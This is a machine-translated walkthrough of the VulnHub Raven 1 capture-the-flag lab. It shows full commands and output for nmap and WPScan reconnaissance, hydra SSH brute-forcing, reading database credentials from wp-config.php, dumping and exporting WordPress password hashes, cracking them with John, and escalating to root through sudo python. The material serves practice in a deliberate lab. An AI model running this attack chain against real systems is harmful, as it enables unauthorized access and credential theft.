Background overview:
Download address: https://www.vulnhub.com/entry/raven-1,256/
The IP of the target is 100.10 10.132, add the IP address to the hosts file and map it to the domain name Raven local.
1. Information collection
1.1 scan target host IP
Use the ARP scan - L command to scan the surviving hosts in the LAN.
└─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 100.10.10.1 00:50:56:c0:00:08 VMware, Inc. 100.10.10.132 00:0c:29:5a:b1:05 VMware, Inc. 100.10.10.253 00:50:56:f5:d5:54 VMware, Inc. 100.10.10.254 00:50:56:e1:62:61 VMware, Inc.
According to the MAC address, we can find that the IP address of our target is 100.10 10.132.
1.2 scan open port of target host
Use nmap to scan the open port of the target host, and use the command nmap - SS - PN - P 1-65535 100.10 10.132.
└─# nmap -sS -Pn -p 1-65535 100.10.10.132 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-28 09:41 CST Nmap scan report for 100.10.10.132 Host is up (0.00083s latency). Not shown: 65531 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 40396/tcp open unknown MAC Address: 00:0C:29:5A:B1:05 (VMware) Nmap done: 1 IP address (1 host up) scanned in 22.46 seconds
According to the results, the target host has opened ports 22, 80, 111 and 40396.
2. Web site detection
2.1 get the first Flag
Through information collection, we found that the target host opened port 80, so we went to the web page to view the relevant source code. We found http://raven.local/service.html The source code under this url link has a flag field - <-- flag1{b9bbcb33e11b80be759c4e844862482d} -->
2.2 wordpress scanning
Found on Web page http://raven.local/wordpress/ There is a WordPress field under the url. Therefore, it can be inferred that the site is built using WordPress, a cms framework. Therefore, WP scan can be used for scanning.
First, update the vulnerability library.
wp-scan --update
Then scan the url.
wp-scan --url http://raven.local/wordpress/
According to the scanning results, the following results are obtained:
server: Apache/2.4.10 (Debian)
WordPress version 4.8.17
It can be found that there is nothing to use.
2.3 SSH service
We found that the site exists urlhttp://raven.local/wordpress/index.php/author/michael/ , found that the user name is MICHAEL.
You can try SSH service blasting with this user name.
Use hydra to generate a dictionary for password blasting. The dictionary uses the most classic FastTrack txt.
hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local
No password.
Let's change to the dictionary generated by cupp and do it again. [ cpuu installation tutorial]
└─# cupp -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: michael # enter one user name
> Surname: michael # enter one user name
> Nickname: michael # enter one user name
> Birthdate (DDMMYYYY):
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 60 words.
[+] Now load your pistolero with michael.txt and shoot! Good luck!
Use the command Hydra - L Michael - P/ michael.txt ssh://raven.local , generate the file Michael Txt, use the file to blast again.
└─# hydra -l michael -P ./michael.txt ssh://raven.local Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-28 14:49:30 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 60 login tries (l:1/p:60), ~4 tries per task [DATA] attacking ssh://raven.local:22/ [22][ssh] host: raven.local login: michael password: michael 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 5 final worker threads did not complete until end. [ERROR] 5 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-28 14:49:37
The account number is michael and the password is michael.
Log in with this account and password. The command is ssh michael@raven.local . You will be prompted whether to connect. Enter yes.
─# ssh michael@raven.local 255 ⨯ The authenticity of host 'raven.local (100.10.10.132)' can't be established. ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'raven.local' (ECDSA) to the list of known hosts. michael@raven.local's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have new mail. Last login: Mon Dec 27 18:25:22 2021 from 100.10.10.129 michael@Raven:~$
3. Right raising
3.1 kernel version
Use the command uname -a to view the kernel version.
michael@Raven:~$ uname -a Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
No exploitable vulnerabilities were found.
3.2 SUID right raising
Check the SUID.
michael@Raven:~$ find / -user root -perm -4000 -print 2>/dev/null /bin/mount /bin/umount /bin/su /usr/bin/procmail /usr/bin/gpasswd /usr/bin/chfn /usr/bin/newgrp /usr/bin/chsh /usr/bin/passwd /usr/bin/sudo /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/sbin/sensible-mda /sbin/mount.nfs
There is nothing to use.
3.3 MySQL login
Traverse the site directory / var/www and find Flag2 Txt file.
michael@Raven:~$ cd /var/www
michael@Raven:/var/www$ ls
flag2.txt html
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
Check the website configuration file / var / www / HTML / WordPress / WP config php.
michael@Raven:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
/** MySQL hostname */
define('DB_HOST', 'localhost')
The MySQL account root and password are found R@v3nSecurity .
Use the command MySQL - H localhost - U root- pR@v3nSecurity Connect to MySQL database.
Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 68 Server version: 5.5.60-0+deb8u1 (Debian) Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql>
3.4 operation database
Use the command show databases;, View the current database.
mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | wordpress | +--------------------+ 4 rows in set (0.00 sec)
Use the command use wordpress to enter the wordpress database.
mysql> use wordpress Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Use the command show tables to view which tables exist in the current database.
mysql> show tables; +-----------------------+ | Tables_in_wordpress | +-----------------------+ | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | +-----------------------+ 12 rows in set (0.00 sec)
Use the command select * from wp_users, view WP_ The contents of the users table.
mysql> select * from wp_users; +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ | 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael | | 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull | +----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+ 2 rows in set (0.00 sec)
It is found that the user name steven exists and the password of the user name $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W /. The password is encrypted.
First export the account password as txt text.
mysql> SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt'; Query OK, 2 rows affected (0.00 sec)
View the text content.
michael@Raven:/usr/share$ cat /tmp/wordpress.txt michael:$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
3.5 file transfer
Start the http service on the target host for WordPress Txt file transfer. Enter the / tmp directory on the target host and run the command python -m SimpleHTTPServer 8888.
michael@Raven:/tmp$ python -m SimpleHTTPServer 8888 Serving HTTP on 0.0.0.0 port 8888 ...
Download wordpress.com of the target host on kali Txt file. Using the command wget http://raven.local:8888/wordpress.txt .
└─# wget http://raven.local:8888/wordpress.txt --2021-12-28 16:27:32-- http://raven.local:8888/wordpress.txt Resolving host raven.local (raven.local)... 100.10.10.132 on connection raven.local (raven.local)|100.10.10.132|:8888... Connected. Issued HTTP Request, waiting for response... 200 OK Length: 85 [text/plain] Saving to: "wordpress.txt" wordpress.txt 100%[=====================================================>] 85 --.-KB/s Time 0 s 2021-12-28 16:27:32 (1.47 MB/s) - Saved“ wordpress.txt" [85/85])
3.6 John password cracking
Use the famous rockyou Txt (kali's own) dictionary to blow up the password. Run the following command in the usr/share/wordlists directory to generate the rockyou.txt file.
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt.gz gzip -d rockyou.txt.gz
On the kali machine, enter WordPress Txt file, run the following command, and use john to crack the password.
└─# john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status pink84 (steven)
The password of steven account is pink84.
Use this account to ssh a remote connection. Using the command ssh steven@raven.local .
└─# ssh steven@raven.local steven@raven.local's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Dec 27 18:43:33 2021 from 100.10.10.129
View current user permissions.
$ whoami steven
3.7 SUDO rights
Try to use sudo Python to raise rights.
Use the command sudo python3 -c 'import pty; pty.spawn("/bin/sh") ', authorization raising failed.
Use the command sudo python -c 'import os; os.system("/bin/sh") ', the right is raised successfully.
$ sudo python -c 'import os; os.system("/bin/sh")'
# whoami
root
Enter the root directory and view the last flag.
# cd /root
# ls
flag4.txt
# cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io